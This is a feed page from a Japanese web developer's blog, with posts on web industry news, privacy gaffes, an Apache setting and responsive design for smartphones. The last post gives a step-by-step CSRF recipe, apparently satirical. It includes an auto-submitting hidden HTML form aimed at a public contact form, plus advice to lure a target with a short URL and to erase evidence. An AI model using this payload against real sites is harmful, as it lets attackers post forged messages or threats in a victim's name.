Quantcast
Channel: Web屋のネタ帳
Viewing all 50 articles
Browse latest View live

DeNAが面白オープンソースソフトを公開→8時間後に普通のOSSに変更

0
0

コトの発端

フタをあけてみたら

シンプルイズベスト

githubなのにw

元気出せ

公開後6時間でライセンス変更

いまココ

2012-01-24 23:00+0900現在、license.ja.txt at master from DeNADev/Arctic.js - GitHub を見ると、MITなんて単語はひとことも見当たらないんだが。。。混乱しすぎ調整できてなさすぎw。 (追記: MIT License とはそういうシンプルな文面なのでした失礼しました。)

深読み

たわいもないゲームのパクりあい、グリーとの訴訟合戦、公取委に踏み込まれるレベルのほほえましい足の引っ張り合い、そんなことばっかりやってるスタッフ部門に対する、技術屋さんのせめてもの反抗か。


厚生労働省の医師等資格確認検索に関する雑感

0
0

コトの発端はこちら

医師を自称する橋本百合香( @SpiritualDr )なる人物の医師免許の存在が確認できない件について: やまもといちろうBLOG(ブログ)

 Twitterで@SpiritualDrという「東電の家族は関西に避難、都内のアイソトープ専門医も家族を関西に避難させてる」等の面白ツイートを連発している御仁がいたので、久しぶりに槍を持って突撃をしてみたところ、本人が医師を自称しているにも関わらずちょっとエビデンスに辿り着けなかったのでピックアップなど。


拡散

コピペとはいえRSSリーダーのbotにもご挨拶

paper.liと組み合わせただけのbotにもご挨拶。好感度UP

だからそれRSSリーダー。

それを言っちゃあ、おしまいよ。

で、流し読みしているだけのあなたのためにここで少し説明をはさむと、 (こまかいツイートはさておき)件のブログの趣旨をよく読むと「おまえはニセ医者だ」とは言ってなくて公式に存在する「医者の存在を確認するためのシステム」の検索にヒットしない≒医師免許の存在が確認できないよという趣旨なのがポイントです。 この検索システムの運用が少々雑であるのも織り込み済みでしょう。

そもそも@kirikさんは、いろいろありますがたとえば日本興業銀行の頭取と数年越しの壮大なバトルを繰り広げ、しまいには相手はお縄になった挙句敗戦処理の人が謝りに来たのち日本史上初のペイオフ発動だったんだぜみたいなことになってましたそういえば。簡単に言うと海千山千です。おまけに奥様は医師だったりします。

が、そんなことまで調べることはしなかったようです。無理ですよねうん。

パクっ!

よっしゃ、(検索とは違う意味で)ヒット!

システムに登録しなおすのももちろんですが、お手元の医師免許証をデジカメで撮ってみるとかいいかもしれませんね。 医師免許証なんて氏名と登録番号くらいしか書いてないし、ご本名で活動なさってるようですし。

謝罪して登録しなおす、で思い出したのですが、たしかゴシップ誌にさされてしまった西川史子さんがそのパターンだったはずです。 西川史子 医師検索 - Google 検索

さて、ここからが今回の本題です。前置き長っ。

医師等資格確認検索でたとえば「西川 史子」で検索してみましょう。名前、登録年が出ます。(番号とあるのはヒット件数にすぎません。)

それだけです。それでどんだけ意味あるんでしょうか。 弁護士情報検索と比べると明らかに見劣りします。まあ司法のみなさんはケンカ上等(ただし大人の)なので名前と所属は個人情報だからなんてナイーブなこと言わないか。

それに、医師検索システムの検索結果をよーく見ると、氏名が画像で出るようになってます。 このシステムの稼動が2007年で個人情報保護法の成立がその数年前というあたりがこういう仕様にからんでいるのでしょう。 それにしても、フルネームの姓名が検索キーとして必須なのに、検索結果表示の姓名を画像で出して何の意味があるんでしょうか。素朴な画面にこめられた仕様は深いです。

以上です。そんだけかよ。でももう眠いんだ。

追記

人名が画像で出るのは、常用漢字と違って人名漢字は通常のPCではうまく表示できない可能性も高いためだ、と気づきました。医師免許証に記載する姓名は戸籍の姓名そのままであることが必須なのではないかと。 しかし、だとすると、この検索システムのDB、数万種類の画像をあらかじめ用意して医師一人一人の情報とひもづけしているんだなあ。いやあ、めんどくさそうな仕様。

警察は、コンピュータ犯罪に使われた&狙われたソフトのソースコードを公開すべき

0
0

いわゆる、フル・ディスクロージャ=完全情報公開。 もちろん実際それは難しかろうし、現実的には第三者のプロを選任して意見を求めるってところだろう。たとえば医療過誤の訴訟では裁判所が第三者の医師を呼んで意見を聞くみたいなこと。コンピュータ犯罪が疑われる場合もそうすべきだ。

時事ドットコム:ウイルス作成容疑で初摘発=28歳無職男を逮捕-大阪府警

逮捕、送検容疑は昨年9月、正当な理由なく、コンピューターウイルスを作成、インターネットを通じてサーバーに蔵置し、ホームページ(HP)に接続しただけでウイルスに感染するようにした疑い。

ウイルス作成罪、初適用…サイト閲覧者に感染 : 社会 : YOMIURI ONLINE(読売新聞)

発表では、小林容疑者は昨年7月以降、自分が運営するサイトを他人が閲覧しただけで、別の掲示板に勝手に書き込みが行われるようにプログラムした不正なウイルスを作成した疑い。  小林容疑者は、神奈川県内の知人男性(26)に、このサイトを閲覧させるため、別人を装って「お前の個人情報がネットに流れている」とアドレスを記載したメールを送信。  男性がサイトに接続すると、小林容疑者が別に運営する「アニメ情報ニュース掲示板」に、「さっさと閉鎖しろ。さもないとお前の両親を殺して家を燃やす」などといった文言が、男性が知らない間に、書き込まれていたという。  小林容疑者は昨年9月、「(男性に)閉鎖を強要された」と府警に被害届を提出。しかし、その後、男性が閲覧したサイトに、ウイルスが仕込まれていることが判明し、府警が小林容疑者を追及。ウイルスを仕込んだことを認めたため、25日に不正指令電磁的記録供用容疑で逮捕したところ、「ウイルスは自分が作った」とも供述したという。

ウイルス作成罪初適用 男を送検 別人装いメール ― スポニチ Sponichi Annex 社会

捜査関係者によると、小林容疑者は昨年9月、「『住所を特定したから殺しに行く』と脅迫メールが来た」と府警に被害申告。府警が発信元とされる神奈川県の知人男性から話を聞くなどして調べたところ、知人のパソコンは自動的に、小林容疑者にメールが送られるウイルスに感染していた。  捜査の結果、小林容疑者が知人に対し、別人を装ったメールにウイルスを添付していたことが判明し、小林容疑者を不正指令電磁的記録供用容疑で逮捕。さらにウイルスの作成容疑を加えて送検した。小林容疑者は知人とインターネットサイトの運営をめぐり、訴訟を起こされていた。

ウイルス作成:28歳の男を送検 全国初の適用 大阪府警 - 毎日jp(毎日新聞)

逮捕容疑は昨年9月中旬、関東地方に住む知人男性のパソコンを誤作動させる目的で、インターネットサービスを提供するサーバーにウイルスを送信したとしている。  府警によると、小林容疑者と男性はいずれもサイト運営者で、ネット上でトラブルになっていたという。サーバーを通じて男性のパソコンにウイルスを送ることで、「掲示板を閉鎖しろ。さもなくば両親を殺す」などと男性が小林容疑者を脅迫する内容の文面をネット上の掲示板に書き込んだように見せかける仕組みだったという。

激しく同意

ウィルス作成罪の適用対象じゃない可能性高そうという点も激しく同意

正直このニュースは聞き流してしまっていたんだが、Web屋としては「CSRFじゃね?」と言われてハッとするというか、ものすごい腑に落ちるところがある。

これは恐ろしい、、、。

これにもはげしく同意。

この件、岡崎図書館事件のときとちがって、悪意の有無で言えば有のほうであることに間違いはなさそうだが、警察の事実認識が完全に間違っている可能性は否めない。

しかし、関係するソースコードを見せてくれたらあっさりすっきり解説できる自信あるという人は俺だけじゃないだろう。

see also

コドモのソーシャルネットワーク事情~親ならこれだけはやっておけ

0
0

うん。いい資料だと思うので、そのまんま借ります。

なお、「パスワードはメモってちゃんと管理しましょう」という点について「プププ、紙に書いちゃだめでしょ」とかいうツッコミをする人がもしもいるとすればそれはケースバイケースという言葉を知らない困ったちゃんだと思います。

この人どうすんだろなあ

0
0

V2用のAPIキー発行について - Google-Maps-API-Japan | Google グループ

現在、お客様向けサイトの構築においてGoogle Maps API v2を使ったマップを作っています。

しかし、今日までは開発環境用のキーを使っていたため本番環境用のキーを発行しようと本日、少し久しぶりに Googleの発行ページ
にアクセスしたところ、キーの発行が出来なくなっていました。

v2が廃止され、v3に移行することをこの時知ったのですが、お客様のサイトの公開が間近に迫っているため、これからv3用に作り替えることはできません。

とりあえずv2で公開し、後日v3対応をしたいのですが、何とか v2用のAPIキーを発行する手段はないでしょうか?

必死の徹夜で作り直すか、旅に出るしかないんだろうなあ。合掌。

Apache2.0とApach2.2の間で地味に効きそうな、ささいな違い

0
0

apache httpdは既に2.4が出ていますが、まだ2.2系統、あるいはもっと老舗のサイトではいまだに2.0系統を使っているところも多いんじゃないでしょうか。

で、たまたま2.0と2.2のマニュアルを見比べてて気がつきました。 いろんなパスを、ServerRootからの相対パスで指定できるように徹底されているっぽい。

例えばDocumentRoot

http://httpd.apache.org/docs/2.0/ja/mod/core.html#documentroot

DocumentRoot /usr/web

この場合、 http://www.my.host.com/index.html へのアクセスがあれば /usr/web/index.html が返されます。

http://httpd.apache.org/docs/2.2/ja/mod/core.html#documentroot

DocumentRoot /usr/web

この場合、 http://www.my.host.com/index.html へのアクセスがあれば /usr/web/index.html が返されます。 directory-path が絶対パスでない場合は、 ServerRoot からの相対パスとみなされます。

太字の部分が2.2以降で追加されたようです。しかし、2.2あるいは2.4を既に使っているのに、昔のクセで、DocumentRootをフルパスで書いてる人、多いんじゃないでしょうか。 ServerRootとはかけ離れた場所にDocumentRootを切っている場合は特にうれしくもありませんが、apacheに何か仕込んだ形のソフトを配布するような場合は相対パス指定できるほうが便利のはずです。

このあたりのこと、昔のChangeLogとかに書いてあんのかな?

楽天BBchatTVの野々村さんからメールが届いたよ

0
0

今日はつまらん話です。 いろいろな観測用の捨てアドをたまたま開いたら、こんなメールが届いていたのです。

あいかわらず楽天もいろいろ買収だなあっておいおいモバゲーのことをいかがわしい出会い系だとか言ってさんざんぱらベイスターズ買収を邪魔しまくって二代目ナベツネ一直線な感じになりつつある某社長はご承知の提携なのでしょうか。いやあ、まずいっすよ。深夜まで女性とごゆっくりですってよ。

気になったのでメールをFromでソートしたら、数ヶ月または1年くらいの不定期な間隔でメルマガが届いていました。 以下、直近の4通のFrom, Date, Subectだけ。

Date: Tue, 23 Nov 2010 01:44:09 +0900
Subject: 【BBchatTV】秋の感謝デー!年度別 " 半額 " 開放合計6時間サービス!!
From: BBchatTVサポート <news@bb-chat.tv>

Date: Tue, 18 Oct 2011 22:53:05 +0900
Subject: 【重要】 ポイント価格改定のお知らせ / BBchatTV 運営事務局
From: BBchatTVサポート <news@bb-chat.tv>

Date: Tue, 17 Jan 2012 13:41:25 +0900
Subject: 【BBchatTV】 『+500円』のポイント増量中! 新規ご登録なら今がチャンスです♪
From: BBchatTVサポート <news@bb-chat.tv>

Date: Sun, 8 Apr 2012 10:08:18 +0900
Subject: 【楽天 BBchatTV】休日も全女性対象のオール開放!!半額サービス実施!<< リセット有 >>
From: BBchatTVサポート <news@bb-chat.tv>

なお、ちらっと見た限りでは決済手段として楽天あんしん決済サービスが使えますという以外に楽天株式会社との関連性は見あたりませんでした。

まあ、最近じゃニコ生に張り付いてれば中学生の女子とかが生放送してるらしいので、昔ながらのチャットサービスじゃ苦しいですよね。そういや今日も幕張でなんかイベントやってたらしいですね。商売ってたいへん。

佐賀県武雄市の市長さんが今すぐブログで語るべき一言

0
0

SAGAのとある町の市長さん。市役所のホームページをfacebookに全面移行したりとか、けっこう斬新なことをやっていらっしゃる。個人的にはこういう人は嫌いじゃなく、むしろもっとがんばってほしい。 が、しかし、きちんと認識を改めてもらわないとね、ということはやはりある。

火元はいつもの高木先生→ 武雄市長、会見で怒り露に「なんでこれが個人情報なんだ!」と吐き捨て(2012/5))

本人は

とかおっしゃってますので、ここはひとつ、ご自分のblogに書くべき例文を立案してみますね。

失言しました。申し訳ありません。

数日前に、市の図書館の運営をCCC(カルチュアコンビニエンスクラブ、要するにTSUTAYA)に委託することを発表しました。Tポイントカードで図書館の本を貸し出せるようにすれば図書館のシステム費用の削減につながるでしょうし、それ以外にもいろいろと利便性を高める施策を考えてます。

がしかし、その発表記者会見の席上で、「ああ、ただね、ひとこと言うと、これ(本の貸し出し情報)ね、今までね、これ個人情報だって名の下にね、全部廃棄してたんですよ。なんで本をね、借りるのが個人情報なのか、って僕なんか思いますので。 じゃあどこまでいくかは別にしてね、で、僕はそれを元にしてリコメンドを出したいんですよ、リコメンドを。」 とか言っちゃいました。「そうですもちろん市民の同意の上です。ですので、そういう意味で僕はもう、元々、何を借りたかっていうのは、なんでこれが個人情報だ!って思ってるんで」とも言っちゃいました。

武雄市サザエ町のヤマダさんがアドルフヒトラー著「我が闘争」を借りたとか、武雄市カツオ町のタナカさんが「薔薇族」と「本当は怖い性感染症」を借りたという貸し出し履歴情報が個人情報じゃないわけないですよね。すいません、本当にすいません。

さきほど図書館の司書の方にも怒られました。戦時中に図書の貸し出し履歴を特高(特別高等警察)に提供したせいで多くの政治犯が捕まったりいわれのない弾圧を受けることになった教訓として、裁判所の令状でもない限りは貸し出し履歴情報を警察にはもちろん何人にも提供しないということが、司書になるための教科書には必ず載っているそうですね。

なお、「2012年5月5日13時15分に武雄市ワカメ町の磯野波平さんがL.Oを借りた」は個人情報ですが「2012年5月に50代男性がL.Oを借りた」ならそれは統計情報ですので、そういうふうに運用したいと思いますがいかがでしょうかダメですかそうですか。

それから、図書館運営の民間委託でどんだけコスト削減するのか数値を見せろだとか入札じゃなくていきなり随意契約ってそれでいいのかとか言うザレゴトに付き合う気はさらさらないので黙ってろ愚民ども。

see also:


SAGA県 武雄市の市長さんが失言の腹いせに産総研に圧力(かけちゃうぞ)

0
0

自分の認識不足と失言を刺された腹いせに組織に圧力をかけると脅す市長。 実に元官僚らしい手際のよさです。 市長はともかく日本ツイッター学会長にはふさわしくない。

see also:

ただし「図書館の自由」とか言ってる奴はそりゃ図書館戦争の読みすぎだろという意見には禿同。

ケンコーコムが楽天傘下に。

マンツーマン英会話レアジョブは、いろんなサイトで同じパスワードを使いまわしている人はパスワード変更してねとちゃんと書け

0
0
  1. しばらくサービス停止しなきゃならんほどの重大なセキュリティインシデントがあって、
  2. 流出した可能性のある情報にパスワードが含まれるのであれば、
  3. いろんなサイトで同じパスワードを使いまわしている人は全部のパスワードを変更してね、と書くべき。

こんなことは、もう、Webサービスを運営する者の共通認識にしなきゃいけないと思うんだ。

でも、無理だろうね。流出した可能性がある情報=メールアドレスとパスワードと...って書いておいて、それは平文なのかハッシュなのかなんて一言も書いてないわけで、それはおそらく「ハッシュナニソレウマイノ?」的な最低の人々が運営してることの傍証でもあるのだから。 そう、サイテーっていう称号を与えてもいいと思う。そういってもいい時代だと思わないか?2012年なんだぜ?

see also

おそらくこんな感じだろうと思ってグーグルマップとフォトショップで作ってみた

いまのWebサイトを低予算でスマートフォンに対応させるための5つのTIPS

0
0

いまどきのケータイは全てスマートフォンです。 では、「いまあなたが仕事で関わっているWebサイトをiPhoneやandroid端末で見たとき、その見栄えは実用に値するレベルですか?」と聞かれると黙ってしまうそこのアナタですよアナタ。まあ聞いてくれ。

mixiの例をひもとくまでもなくWeb屋にとってケータイ対応は避けて通れない。PC向けに加えてガラケー3キャリア対応までやるヒマも予算もビジネス的勝算も無いからと見て見ぬフリするような姿勢は遠い過去のものだ。スマートフォンの普及が状況をワープさせた。

話はそれほど難しくはない。

TIP 1. まずガラケーを切り捨てる

「ちょww待てww」とかそうおっしゃらず。

絶対わざとだろってくらいCookieに対応しなかったクソdocomoの肥溜めをさらうためにセッションIDのURL埋め込みやら契約者固有IDやら危なっかしい実装で綱渡りをしつつ一歩でも間違えると穴が丸見えとかわけわかんない新聞ネタにされるリスクをかかえたまま試験端末のレンタル屋に通いつめて両手に端末持ってチマチマいじりながらそういえばそもそもC-HTMLなのXHTMLなのCSSは外部なのインラインなの?...

そんな不毛かつ100%消え行く運命のノウハウを議論し実装し続けるくらいなら、もっと本質的なこと=自分のサイトのコンテンツやサービスそのもの=にヒトモノカネのリソースをあてるっていうのが予算の有効活用というものだ。決して言い過ぎじゃないと思う。 ガラケーは、いまこそ清算してしまうべき技術的負債というやつなのだ。

cookieやjavascriptが使えるようになったiモードブラウザ2.0があるじゃないかって? ご存知の人はご存知の通り、iモードブラウザ2.0はかなりのいわくつきである。

ある程度の仕様の共通性が保たれるべきJavaScriptに対して、やれalert()は使わせないだのなんだのと、登場直後から大慌てでバカバカしい技術的負債を膨らませてしまっているのだ。理由を明かすこともできないまま。いつかツケを払うことになるだろう。

そうそう、先に言うべきでしたが、今回お話をする5つのTIPSではWebデザインの観点とWebアプリケーションの観点が少々ごっちゃになっております点をご容赦下さい。

TIP 2. 問題はPCかスマートフォンかではなく、画面が大きいか小さいか、だ。

とにかくガラケーをぶった切れば、あとはPCとスマートフォンのことだけを考えればいい。そうなるとCookieもJavascriptもHTMLも仕様はほぼ共通。だからこそ、考え方を改めよう。PCかスマートフォンか、ではなく、「ユーザーの画面が大きいか小さいかの違いに対してこのWebサイトはどう対応するのか?」そこに本質がある。

iPadは今でこそ1024x768=その辺のノートPCと同じ=だけど、違うモデルもそのうち出るだろう。iPad以外にもなんだか中途半端な大きさの端末だって出ている。それに、孫の写真を収めたメモリーカードごとおばあちゃんにプレゼントしたデジタルフォトフレームには実は無線LANとchromeブラウザが搭載されてますなんていう未来はそう遠くない。その画面サイズはいったい何インチ何ドットなんだろう。

なお、新型iPhoneは驚きの解像度で小さな文字も鮮明に見えるらしい。それを考えると画面自体の大小だけでなくその解像度もWebデザインに大きな影響を与えると言える。とはいえ、解像度に頼るアプローチはもう限界に達した。液晶画面の解像度の向上は見込めても人間の目の解像度はこれ以上向上しないからだ。

とにかく、端末の機種やブラウザやOSやそのバージョンによってWebデザインを変えるというのはあまりいい作戦じゃない。

function is_mobile () {
    $user_agents = array(
      'iPhone',         // Apple iPhone
      'iPod',           // Apple iPod touch
      'Android',        // android
(以下、延々と書き加えることになる)
こんなクソコードはあくまでも最後の手段であって最初から取るべき方針ではない。 ではどうすべきか?

TIP 3. CSS Media Queriesと metaタグのviewportを使った新種のリキッドデザイン

Webサイトとそのユーザーの間で画面サイズの違いを自律的に仲立ちしてくれるデファクトな仕様は、実はこの二つしかない。今のところ。

CSS Media Queriesviewportの詳細については各自ググっていただくとして、ここではまずサンプルを示したい。

  1. 何の変哲も無いよくある2段組CSSデザインのページ(HTML4.01)が、
  2. スマートフォンで見ると、こう見える。(画面キャプチャ)

通常のPCではよくあるデザインにしか見えないHTMLだが、スマートフォン上ではcss media queriesによってヨコ並びのdivブロック自体がタテに並んでいる。ある意味、リキッドデザインである。また、viewportのscale設定によって、自動縮小されること無く読み始められるレベルの文字サイズでいきなり表示される。

最近、xperiaがピンチ操作(二本指操作で画面を拡大縮小)できなくて残念だという話題があったが、これはスマートフォンで通常のWebサイトを見るとほとんどの場合にかなり小さく縮小された状態で表示されてしまうので何も読めないというストレスの裏返しなんじゃないだろうか。上述の通り、css media queriesとviewportをうまく使えば一気にこれを解決できる。

TIP 4. 「おいおい、つまり、PC向けのページも含めたWebサイトデザインの完全リニューアルってことじゃないか。これのどこが低予算でのスマフォ対応なんだ!」

それは、いつかは全面CSS化しなきゃならなくなるだろうと薄々わかっていたくせにズルズルとtableタグでの幅固定デザインのままここまで来てしまったあなたの愚痴いや責任である。

  1. PC向け、ガラケー3キャリア向け、スマフォ向け、いつか登場するであろうなんだかわからないジャンルの端末向け、といった感じで複数種類のデザインテンプレートとアプリケーションコードを開発しUser-AgentやキャリアのゲートウェイIPアドレスのリストをメンテし続ける手法。自由度は高いがコストはすごく大きい。しかもこれは、Webサイトデザイン的に見てもWebアプリケーション的に見ても、技術的負債を雪だるま式に膨らませることになる闇金エンジニアリングである。
  2. 基本デザインはひとつのままで、画面サイズに合わせてCSSを調整あるいは(media queries的な意味での)分割をするだけで済ませる手法。デバイスに合わせてのデザインの自由度はやや低いがコストは小さい。アプリケーションのコードもほとんど統一できるだろう。技術の進化を素直に享受しつつ自分のビジネスにおける真の課題と向き合う時間を増やすことができる。

2010年11月現在から数えるとして、むこう2,3ヶ月ならともかくむこう1,2年以上のスパンで見れば、上のどちらの方針が最終的に高いコストパフォーマンスをもたらすのか、明白なんじゃないだろうか。

TIP 5. ところで、広告の位置とサイズどうする?

実はこれが一番問題になるんじゃないだろうか。広告といっても自社広告やらadsenseやらそのサイズもいろいろあるのでコレといった共通手段がない。viewportで言うところのdevice-width等の実際の値をjavascriptで拾ってそれにあわせたサイズの広告を出すようにコントロールするとか?(無理だろうな)。そもそもPCと同じサイズ/数の広告をスマートフォン等の小さな画面に全部出せるわけもないので、いくつかの広告表示用のブロック要素をdisplay:noneするようにCSSに書くしかないのかもしれない。 各自の健闘を祈る。

以上、2010年11月に書いた記事の最初の一文を除くすべてを自己パクリして2012年6月の今アップしてみるテストでした。

すべてのプログラマが学ぶべきたったひとつの言語

記念コピペ(単なるメモです)

0
0

ゲームに興味ないのでさっぱりわからないのですが、とりあえず保存っていうかコピペしてみる。 ちなみに画像はこちら

パブコメ骨子

1)「オンラインゲームの『コンプガチャ』と景品表示法の景品規制について」として「考え方」及び
「『懸賞による景品類の提供に関する事項の制限』の運用基準について」改正案を公表された。しかし、
改正案は、以下の①乃至③のとおりコンプガチャ以外のゲーム一般まで適用されるとも解釈されかねな
い広い規定となっている。今後事業者がゲームを安心して作ることができなくなり、ゲーム業界に必要
以上の萎縮効果等の悪影響を与えかねないものであるため、コンプガチャ以外のゲーム作成に影響がな
いことが明確となるようにすべきである。
①考え方では「アイテム等」の定義がなされているが、改正案では当該定義がない。
②考え方では、揃える対象を異なる「図柄」としているが、改正案はその旨の記載がない。
③消費者庁の告示では、規制の条件は「景品類」を提供する場合に限定されているが、改正案では「景
品類」に限定されていない。

2)有料ガチャを通じて得たゲーム中で用いるカード全てのうち、数種類を組み合わせ、これらのカー
ドを組み合わせて別のカードとして(いわゆる「合成」)、強いカードやアイテムを得ることは、ゲーム
では広く一般的に行われている。このようなものは「カード合わせ」に該当しないという理解でよいか?

3)有料ガチャを通じて得たゲーム中で用いるカードを集めると、特殊な効果が発生することや攻撃力
がアップすることは、ゲームでは広く一般的に行われている。顧客誘引効果が著しく高くない場合や、
通常、経済的対価を支払って取得するようなものでもない場合は、カード合わせに該当しないとして、
通常のゲームの仕組みとして従前から長らく消費者に支持を得ており、継続を認めるべきではないか

4)有料ガチャを通じて得たゲーム中で用いるカード A 2 枚を合成して B とし(A+A⇒B)、また A と B
を合成して C とし(A+B⇒C)、さらに A と C を合成して D とする(A+C⇒D)ような場合は、カー
ド A を4枚集めることと同等と考えられるため、仮に上記 D が景品類に該当したとしても、同種のカ
ードのカード合わせとなり、現行告示の適用除外になると考えられるが、その理解でよいか。

元ネタはこちら


日本のインターネットを憂うブログが微妙に面白くない件

0
0

ネット上のちょっとした事件をネタに日本のインターネットを憂う方のブログを発見しまして、エントリーを2,3本見たんですが、いやあ、面白くなかったです。暑いですね職探しがんばってくださいとか大きなお世話ですかそうですか。

日本国が危険な自主規制社会に突入しようとしている (本の虫 2012/7/16)

高木浩光っていうおっさんが「スマホサイトのエロ広告うぜえ」とつぶやくと日本は危険な自主規制社会に突入ですってよ奥様。実際のところ18歳以上ですかはいいいえボタンを押してから出すべき絵を審査の甘い広告屋が野放図におっぴろげてるけど誰かどうにかしろよという話でしかありませんお疲れ様でした。

DNSの終焉が垣間見える、ぶっ飛んでて危険すぎるお名前.comの検閲事件 (本の虫 2012/7/15)

第一報を聞いたときは「ドメイン更新忘れか?久々に聞いたなw」などと思っていたのですが、どうやら、忍者ツールズやってるサムライファクトリー社のWebサービス(アクセス解析とかブログとかいろいろ)のうち、なんかヤバげなモノをユーザーがアップして使ってた的なところが発端かなと。クレームならサムライファクトリーのサポートに投げりゃいいものを、そのドメインレジストラたるお名前.comのサポートにまで投げるクレームおばさんとかいらっしゃったのでしょう。 あくまでも完全に個人的な憶測ですのであしからず。

このように、結論として両社同時に連名でまったく同じリリースを出すということはそこには大人の会議と大人の手打ちがあったということでありまして、どちらのサポート体制がタコだったのかを詮索するのは野暮というものです。いやつまり両方タコってことなんですけどね。 ただし、DNSとドメインのなんたるかをいまだに学んでいないお名前.comにドメインを預けるのはいろんな意味でリスクがあるということだけは過去の事例からも明らかです。

例のブログに話を戻しますと、namecoinとかいう分散DNSの思想と実装があるというのは初めて知りまして勉強になりました本当にありがとうございました。

追記

これはすばらしいまとめ!

Geekなぺーじ:お名前.comによる忍者ツールズ停止措置に関して

そしてはっきりした。 お名前.comはDNSをまともに運用する能力が無い。技術的にもビジネス的にも。

デスマーチがフジロックを笑ってら

0
0

自覚症状の無い蔑称ブーメラン。

サイバーエージェントがまたやらかしてる(3年ぶり3度目)

0
0

めんどくさいのでスマホじゃなくてスマホのエミュレータで登録してみた。

GIRL'S TALK(ガールズトーク) 女性限定完全匿名コミュニティ

まあただのトークだし、いいじゃないですか。ユーザーが埼玉のおっさんでも。

それにしても、サイバーエージェントのこの手のサイトの歴史と言えばgocoo(ゴクー)そして「男の子牧場」と、3年おきくらいのペースでリリースされては消えを繰り返しておるわけでして、ああ、GirlsTalkはまだ消えてませんでしたお詫びして訂正しますが、とにかく社員の5人に1人が新入社員になっちゃったとか言う話もありましたようにやはり組織としての学習能力の無さ加減は実にインターネット企業的と言えましょう。

see also

追記

ゴルゴみたいな知人に「説明不足だ...」と言われまして、追記。

女性専用とうたいつつも、男性(つまりネカマ)による閲覧、投稿を阻止する有効な防波堤がまったくない。これは男の子牧場のときもそう。 広告でご飯食べてる以上は媒体が必要なのですが、その媒体自体を自前でこしらえていこう、というのが最近のCAの戦略です。しかしその媒体の信頼性には気を配らない悪いクセはどうにかしたほうがいいと思うんですよ。性別をキー要素とするサイトを運営するには実際どんな努力と忍耐力が必要なのか、それを怠るとどうなるのかという話は過去記事をどうぞ。

売れたもん勝ち

0
0

秋元康の運転手をしながら車の中で「もしドラ」の草稿を書いていたという「もしドラ」作者ハックル先生こと岩崎夏海氏がちょろっとネガティブな書評をされたところ「へーいへーい。ばーかうんこ」とドラッカー並の深い示唆を返されたそうで、なるほどさすが楽曲という名の握手券と選挙権をもって日本の歌謡シーンを席巻している御仁のパダワンたるものかくあるべし。売れりゃいいんですよ。売れりゃ。

悪口を楽しもう - ハックルベリーに会いに行く 2008/12

よくネガティブなことを悪く言う人がいるけれども、ぼくに言わせればネガティブなことに対してネガティブになることもまたネガティブなことである。だからネガティブなことに対してもポジティブになるのが良いと思う。具体的に言うと、もっと悪口を言うことを楽しむのが良いということだ。

ぼくは本当に悪口が好きだ。生まれてからこれまで人のことを悪く言わなかった期間がないくらい、ずっと誰かのことを積極的に嫌いだったし、積極的にバカにしてきた。そして積極的に悪口を言っていた。悪口を言うことを楽しんできた。

ぼくは悪口から多くのことを教わった。悪口はいつだって極上のエンターテインメントで、上質のクリエイティビティを多くはらんでいた。議論なんかしているヒマがあったら、悪口を言ってた方がよっぽどましだ。悪口の良さが分からない人は、本当の悪口を言ったことがないのだと思う。

ぼくはこれからも悪口を言っていきたい。積極的に悪口を楽しんでいきたい。そしてぼくの好きな人に対しては、積極的に悪口の輪を広めていきたい。みんなでワイワイ悪口を言いながら、人生を楽しく豊かで幸せなものにしていきたいんだ。

深い。実に深いです。ハックル先生こと岩崎夏海氏の次回作を生暖かく手ぐすね引いて待ちましょう。えっ?次回作も次々回作ももう出て(ry

see also

  • 404 Blog Not Found:「本は、購入した人の所有物ではありません」という著者は一刻も早く完全電子化を! 2011/12
    いやあ、書評しなくてよかったなあ。献本いただいたのだけど御礼とおりこしてありがた迷惑だった一冊だけに。
    (中略)
    内容は「ドラッカーを誤読しまくったあげく上あまつさえその誤読を本にしたあげく売りまくった」ことを除いてきれいさっぱり忘れてしまったのだけど、おかげで我が身の忘却力を再確認できたし、私が選考委員であればイグノーベル文学賞はこれ以外推奨しようがない。いや、イグノーベル平和賞か。どれだけ原典を食い物にして慰み者にしようがおとがめなしなんて、これ以上の平和はありえない。いっそ文学賞は著者に、平和賞は出版社にというのはいかがかと。「ありがた迷惑」なんてとんでもない。改めて献本御礼申し上げます。

CSRFの罠でお問い合わせフォームを現代の凶器にする方法

0
0
  1. なんでもよいのでレンタルサーバとか、あるいはhtmlタグを自由に書ける機能があるブログサービスを借ります。
  2. こんな感じのページを書きます。
    <html>
    <body>
    <form name="frm" 
     action="httpまたはhttps://お役所とか航空会社の問い合わせフォームのcgi"
     method="POST">
    <input type="hidden" name="xxx" value="フォームのソース見てそれにあわせて書く">
    <input type="hidden" name="yyy" value="フォームのソース見てそれにあわせて書く">
    <input type="hidden" name="naiyou" value="世界人類が平和でありますように">
    </form>
    <script type="text/javascript">
    document.frm.submit();
    </script>
    </body>
    </html>
    
  3. このページのURLをメールなりツイッターなに書いて標的に送り、アクセスさせます。 短縮URLサービスを使うとよいでしょう。
  4. ころあいを見て証拠を消します。
  5. SSLだから安全ですなどと言っている人は頭がお花畑です。ほっときましょう。
  6. 心当たりのある人は腹筋1万回やったあと水無しで炎天下グラウンド100周して反省しましょう。

CSRF(クロスサイトリクエストフォージェリ)って言うけど、これはCSRFと言うにもおよばない。単に「JavaScriptによる強制ポスト」と言うほうがふさわしい。 やはりCSRF脆弱性そのものと言うべきだろう、というご意見が多いようで、言われてみると確かにCSRFと言うべきと思えてきました。お詫びして訂正します。あとtypoがあったので直しました

Viewing all 50 articles
Browse latest View live




Latest Images